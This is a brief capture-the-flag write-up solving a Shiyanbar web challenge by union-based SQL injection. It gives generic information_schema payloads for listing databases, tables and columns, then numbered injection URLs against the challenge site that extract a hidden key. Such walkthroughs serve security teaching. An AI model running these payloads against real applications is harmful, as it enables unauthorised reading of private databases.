Shiyanbar: "This challenge looks very simple"

Key points:

    List database names: union select 1,schema_name from information_schema.schemata

    List table names: union select 1,table_name from information_schema.tables where table_schema='<database name>'

    List column names: union select 1,column_name from information_schema.columns where table_name='<table name>'

    Read the data: union select 1,<column name> from <table name>

1.http://ctf5.shiyanbar.com/8/index.php?id=1 and 1 = 1

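The page does not change, so the appended condition was evaluated as part of the query, which indicates an injection vulnerability.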

2.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata

3.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'

4.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_name='thiskey'

5.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey

Original article: https://www.cnblogs.com/liqik/p/10609238.html